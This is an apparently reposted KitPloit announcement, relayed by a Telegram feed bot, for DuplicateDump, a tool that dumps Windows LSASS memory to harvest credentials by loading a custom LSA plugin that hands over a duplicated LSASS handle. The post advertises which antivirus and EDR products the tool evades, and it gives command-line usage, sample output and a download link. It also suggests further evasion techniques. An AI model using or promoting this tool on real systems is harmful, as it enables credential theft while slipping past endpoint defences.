DuplicateDump - Dumping LSASS With A Duplicated Handle From Custom LSA Plugin
https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEie3nSfB41hs0CJGekmcb_wnpRoyhp1ZHAOGgCMkl7f44Gg9JllQnzCCHRC2bn6N2ndJ0eAdm47ant28xRy3nL-RHvo7XYGz9XPEtcQq4HdfXdHEfzl_cSvmOoXcNhBbQ-Q28we1wxk3sgaCV3rXZyXUKG4RHTaMZbDrvGqbXJ3L1SWmCqQvdzVK56I/w640-h314/LSAPlugin.png
DuplicateDump is a fork of MirrorDump with following modifications:
* DInovke implementation
* LSA plugin DLL written in C++ which could be clean up after dumping LSASS. MirrorDump compile LSA plugin as .NET assembly which would not be unloaded by LSASS process. That's why MirrorDump failed to delete the plugin.
* PID of dump process (i.e., DuplicateDump) is shared to LSA plugin through named pipe
* Passing value "0" instead of LSASS PID to MiniDumpWriteDump. This prevent MiniDumpWriteDump from opening its own handle to LSASS
DuplicateDump add custom LSA plugin that duplicate LSASS process handle from the LSASS process to DuplicateDump. So DuplicateDump has a ready to use process handle to LSASS without invoking OpenProcess.
Testing
By loading DuplicateDump in memory, it was able to dump LSASS memory without detection on
* Symantec 14.3
* Kaspersky Enterprise
* Windows Defender
Detected by Cortex XDR, Crowdstrike. Failed to dump lsass without detection on SentinalOne.
Usage
Compile LSA plugin (export either SpLsaModeInitialize or dllMain function) and provide the full path of DLL to DuplicateDump
.\DuplicateDump.exe --help
-f, --filename=VALUE The path to write the dump file to
-p, --plugin=VALUE Full file path to LSA plugin
-c, --compress GZip and delete the dump file on disk
-d, --DebugPriv Obtain SeDebugPrivilege
-h, --help Display this helpExample
.\DuplicateDump.exe -f test -c -p C:\LSAPlugin.dll [+] Loading LSA security package [+] Named pipe connected and replying with current PID 6492 [+] Found duplicated LSASS process handle 0x3d0 [+] Compressed dump file saved to test.gz Improvement
*
DuplicateDump use DInvoke to call API AddSecurityPackage to load a LSA plugin. You could use RPC call without having to invoke that API call directly. Check details in XPN's blog post
*
Recently, splinter_code discovered that SecLogon could be leveraged to dump LSASS. Strongly recommend you to study his blog post.
References
* https://github.com/CCob/MirrorDump
* https://rastamouse.me/dumping-lsass-with-duplicated-handles/
* https://github.com/jfmaes/SharpHandler
Download DuplicateDump
➖ Sent by @TheFeedReaderBot ➖
___________________________
@hacking_Attack
@Hacking_Video
KitPloit - PenTest & Hacking Tools
DuplicateDump - Dumping LSASS With A Duplicated Handle From Custom LSA Plugin
DuplicateDump - Dumping LSASS With A Duplicated Handle From Custom LSA Plugin
http://www.kitploit.com/2022/05/duplicatedump-dumping-lsass-with.html
___________________________
@hacking_Attack
@Hacking_Video
http://www.kitploit.com/2022/05/duplicatedump-dumping-lsass-with.html
___________________________
@hacking_Attack
@Hacking_Video
KitPloit - PenTest & Hacking Tools
DuplicateDump - Dumping LSASS With A Duplicated Handle From Custom LSA Plugin